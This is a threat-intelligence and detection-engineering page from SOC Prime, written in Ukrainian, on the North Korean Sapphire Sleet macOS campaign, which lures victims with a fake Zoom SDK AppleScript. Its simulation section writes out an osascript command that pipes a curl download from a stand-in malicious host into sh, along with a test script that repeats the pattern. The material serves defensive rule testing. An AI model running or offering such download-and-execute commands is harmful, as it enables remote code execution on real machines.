Розбираємо macOS вторгнення Sapphire Sleet: від приманки до компромісу

SOC Prime Team

Стежити

Розбираємо macOS вторгнення Sapphire Sleet: від приманки до компромісу

Detection stack

AIDR
Alert
ETL
Query

Звіт про загрози
Потік атаки
Виявлення
Симуляції

Резюме

Microsoft Threat Intelligence повідомляє про кампанію, орієнтовану на macOS, яка приписується північнокорейському державному актору Sapphire Sleet. Операція покладається на соціальну інженерію, щоб переконати цільових осіб запустити шкідливі файли AppleScript, представлені як законне оновлення Zoom SDK. Після виконання, скрипт завантажує додаткові завантаження через curl and osascript, розширюючи проникнення в декілька етапів. Шкідливе програмне забезпечення розроблено для викрадення облікових даних, даних криптовалютних гаманців та іншої чутливої інформації, а також обходить вбудований захист macOS, щоб залишатися активним на скомпрометованих системах.

Розслідування

Розслідування окреслює багатостадійну ланцюжок зараження, що починається з .scpt файлу-приманки і продовжується через послідовність curl-до-osascript завантажень корисного навантаження. Дослідники ідентифікували декілька компонентів бекдору, включаючи com.apple.cli, службовий бінарник, icloudz, і com.google.chromes.updaters. Ворожі актори також були помічені на втручанні в базу даних macOS TCC для надання дозволів AppleEvents, використовуючи методи завантаження коду та встановлюючи збереження через демон запуску. Екфільтрація відбувалася через спеціальні строки користувача-агента і зв’язок через API Telegram Bot.

Мітигація

Apple вже випустила оновлення Safe Browsing і XProtect, щоб порушити інфраструктуру кампанії та компоненти шкідливого програмного забезпечення. Microsoft рекомендує блокувати виконання .scpt файлів, обмежувати небезпечні curl конвеєри, моніторити несанкціоновані зміни в базі даних TCC і перевіряти установки демонів запуску на наявність підозрілих записів. Користувачів слід попередити про непрохані запити на оновлення програмного забезпечення і радити не надавати облікові дані через несподівані діалоги чи скрипти.

Відповідь

Захисники повинні виявляти виконання зловмисного AppleScript, аномальні curl строки користувача-агента і вихідні з’єднання з відомими доменами командування та управління. Всі виявлені бінарні файли та демони запуску повинні бути негайно карантинізовані або видалені, після чого слід здійснити скидання облікових даних для постраждалих користувачів і перевірити цілісність бази даних TCC. Реагуючі на інциденти також повинні провести судову експертизу зібраних артефактів системи і відновити постраждалі дані з чистих резервних копій, де це необхідно.

graph TB %% Class definitions classDef technique fill:#99ccff classDef operator fill:#ff9900 %% Technique nodes tech_user_execution[“Техніка – T1204.002 Виконання користувачем: Шкідливий файл Опис: Жертву змушують запустити шкідливий файл, який ініціює проникнення.”] class tech_user_execution technique tech_trusted_dev_proxy[“Техніка – T1127 Виконання через довірені інструменти розробника Опис: Легітимні інструменти розробки використовуються як проксі для запуску шкідливого навантаження з обходом захисту.”] class tech_trusted_dev_proxy technique tech_subvert_trust[“Техніка – T1553 Підрив механізмів довіри Опис: Зловмисники маніпулюють довіреними зв’язками або конфігураціями для отримання підвищених привілеїв або виконання коду.”] class tech_subvert_trust technique tech_launch_daemon[“Техніка – T1543.004 Створення або модифікація системного процесу: Launch Daemon Опис: Створюється новий демон або змінюється існуючий для забезпечення закріплення в системі.”] class tech_launch_daemon technique tech_alt_auth_material[“Техніка – T1550 Використання альтернативних матеріалів автентифікації Опис: Викрадені або підроблені облікові дані, токени або сертифікати використовуються для входу як легітимний користувач.”] class tech_alt_auth_material technique tech_archive_lib[“Техніка – T1560.002 Архівування зібраних даних: через бібліотеку Опис: Дані стискаються за допомогою програмної бібліотеки перед ексфільтрацією.”] class tech_archive_lib technique tech_exfil_alt_proto[“Техніка – T1048 Ексфільтрація через альтернативний протокол Опис: Дані виводяться через нестандартні протоколи, такі як DNS, FTP або кастомні порти.”] class tech_exfil_alt_proto technique tech_dynamic_resolution[“Техніка – T1568 Динамічне резолювання Опис: Інфраструктура керування визначається під час виконання, часто через DNS або інші запити.”] class tech_dynamic_resolution technique tech_reflective_loading[“Техніка – T1620 Рефлективне завантаження коду Опис: Шкідливий код завантажується напряму в пам’ять без запису на диск.”] class tech_reflective_loading technique tech_system_binary_proxy[“Техніка – T1218.003 Виконання через системні бінарні проксі Опис: Довірені системні бінарники використовуються для запуску шкідливого коду.”] class tech_system_binary_proxy technique tech_modify_auth_process[“Техніка – T1556.001 Модифікація процесу автентифікації: контролер домену Опис: Механізми автентифікації змінюються для прийняття підроблених даних.”] class tech_modify_auth_process technique %% Connections showing attack flow tech_user_execution –>|leads_to| tech_trusted_dev_proxy tech_trusted_dev_proxy –>|enables| tech_subvert_trust tech_subvert_trust –>|creates| tech_launch_daemon tech_launch_daemon –>|uses| tech_alt_auth_material tech_alt_auth_material –>|prepares| tech_archive_lib tech_archive_lib –>|triggers| tech_exfil_alt_proto tech_exfil_alt_proto –>|facilitates| tech_dynamic_resolution tech_subvert_trust –>|employs| tech_reflective_loading tech_reflective_loading –>|updates| tech_launch_daemon tech_trusted_dev_proxy –>|leverages| tech_system_binary_proxy tech_system_binary_proxy –>|leads_to| tech_subvert_trust tech_alt_auth_material –>|supports| tech_modify_auth_process tech_modify_auth_process –>|continues| tech_exfil_alt_proto

Потік атаки

Опис нападу та команди:
Противник отримав зловмисний скрипт PowerShell-style, розміщений на віддаленому сервері. Щоб уникнути створення самостійного бінарного файлу, вони використовують вбудований інтерпретатор AppleScript (osascript) і передають curl завантаження безпосередньо в інтерпретатор, досягаючи «завантаження і виконання» в одній команді. Це відповідає правилу osascript + curl шаблоном.
```
# Зловмисний командний рядок, що повинен активувати правило
osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'
```
Командний рядок містить як osascript and curl, тому умови правила Sigma (selection_osascript and selection_curl) оцінюється як істинність.

Скрипт регресійного тестування:

# simulate_osascript_curl.sh
# Мета: Відтворити точну телеметрію, що повинна спрацьовувати правило виявлення.
set -e

# Визначити безпечний корисний навантаження для безпеки (echo замість справжнього зловмисного коду)
MALICIOUS_URL="https://example.com/benign_payload.sh"

# Створити хибний безпечний корисний вантаж, що просто виводить повідомлення.
# У реальному тесті red‑team ви б розмістили реальний скрипт; тут ми зберігаємо його безпечно.
curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true

# Виконати AppleScript з curl, переданим у команду shell.
osascript -e "do shell script "curl -s $MALICIOUS_URL | sh""

Команди очищення:

# cleanup_osascript_curl.sh
# Видалити всі тимчасові файли і завершити непотрібні процеси.
rm -f /tmp/benign_payload.sh
pkill -f "osascript -e"

Приєднуйтесь до платформи Detection as Code від SOC Prime щоб покращити видимість загроз, найбільш актуальних для вашого бізнесу. Щоб допомогти вам розпочати та отримати негайну цінність, забронюйте зустріч зараз з експертами SOC Prime.

Приєднатися безкоштовно